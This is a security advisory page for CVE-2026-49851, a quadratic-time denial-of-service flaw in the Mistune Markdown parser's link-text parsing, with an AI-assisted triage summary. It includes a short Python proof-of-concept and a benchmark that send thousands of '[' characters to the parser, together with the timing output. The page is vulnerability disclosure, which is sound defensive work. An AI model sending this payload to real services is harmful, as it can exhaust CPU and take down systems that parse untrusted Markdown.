CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

CVE-2026-49851

highCVSS 7.5covered by 2 sourcesfirst seen 2026-06-09
Summary Mistune is vulnerable to a CPU exhaustion DoS due to superlinear (approximately O(n²)) behavior in parse_link_text. A relatively small input consisting of repeated [ characters causes significant parsing slowdown. Affected component mistune/inline_parser.py → **parse_link_text** Description When parsing Markdown containing many consecutive [ characters, parse_link_text repeatedly scans the input using a regex search inside a loop. Each iteration re-scans a large portion of the remaining string, resulting in quadratic-time behavior. An attacker-controlled Markdown input can therefore trigger excessive CPU usage with a very small payload. Root cause The vulnerability stems from a two-loop interaction: - The outer loop in InlineParser.parse() (inline_parser.py) advances only 1 character at a time when parse_link() returns None - Each failed attempt calls parse_link_text() which performs an O(n) scan to the end of the string looking for a closing ] - With n consecutive [ characters, this results in O(n) × O(n) = O(n²) total work PoC Run below python script import mistune import time md = mistune.create_markdown() s = "[" * 6400 t = time.perf_counter() md(s) print(time.perf_counter() - t) <img width="2028" height="1277" alt="image" src="https://github.com/user-attachments/assets/15d5bc0b-35f8-4a15-85e0-cbc314a45b06" /> Benmark poc Run below code for benchmark import mistune import time md = mistune.create_markdown() sizes = [100,200,400,800,1600,3200,6400] for n in sizes: s = "[" * n t0 = time.perf_counter() md(s) dt = time.perf_counter() - t0 print(f"{n:6d} {dt:.6f}") <img width="2503" height="1341" alt="image" src="https://github.com/user-attachments/assets/f09a7bbb-6927-4ba2-afb1-444dd913b84e" /> Observed behaviour python3 benchmark.py 100 0.001609 200 0.003207 400 0.012906 800 0.050220 1600 0.197307 3200 0.801172 6400 3.190393 Execution time grows superlinearly, consistent with O(n²) complex Impact This can be used as a denial-of-service

CSIRTS triage

What
There is a potential Denial of Service (DoS) vulnerability due to quadratic-time parsing in the parse_link_text function.
Who is affected
Deployments of Mistune are affected.
Urgency
Remediation is necessary to prevent potential DoS attacks, though exploitation is not currently observed.
Action
Update to the latest version of Mistune when available.

AI-assisted analysis generated from the source advisory — verify against the original.

⚡ Watch CVE-2026-49851

Get an email if CVE-2026-49851 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.

Exploitation outlook

Advisory coverage (2)

External references

NVD record for CVE-2026-49851

CVE.org record

Embed the live status

CVE-2026-49851 live status badge — this badge updates automatically when the KEV or exploit status changes. How to embed it →

[![CVE-2026-49851 status](https://www.csirts.com/badge/CVE-2026-49851)](https://www.csirts.com/cve/CVE-2026-49851)